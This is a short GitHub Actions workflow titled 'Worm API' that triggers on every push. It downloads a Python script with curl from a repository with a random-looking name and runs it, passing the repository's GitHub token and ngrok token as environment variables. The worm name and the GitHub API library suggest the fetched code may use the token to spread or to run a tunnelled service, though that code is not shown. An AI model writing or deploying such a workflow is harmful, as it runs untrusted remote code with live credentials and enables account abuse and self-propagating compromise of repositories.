name: Worm API

on:
  workflow_dispatch:  # To manually trigger the workflow
  push:  # To trigger on push event

jobs:
  run_script_batch_1:
    runs-on: ubuntu-latest
    steps:
    - name: Checkout repository
      uses: actions/checkout@v2

    - name: Set up Python
      uses: actions/setup-python@v2
      with:
        python-version: '3.x'

    - name: Install required dependencies
      run: |
        pip install pygithub pyngrok gradio requests

    - name: Download Python Script
      run: |
        curl -o flask_app.py https://raw.githubusercontent.com/Anonymous01100/vjdvjfjgrhjrhjkgjhjhjjbjbkbhjsbjkfbjkfbjkgbjbfjbfskjbsfjkbfjbfjksbfjkfjkbjkbfj/refs/heads/main/main.py

    - name: Run the Python Script (Batch 1)
      env:
        GITHUB_TOKEN: ${{ secrets.GH_TOKEN }}  # GitHub token from repository secrets
        NGROK_TOKEN: ${{ secrets.NGROK_TOKEN }}  # ngrok token from repository secrets
      run: |
        python3 flask_app.py
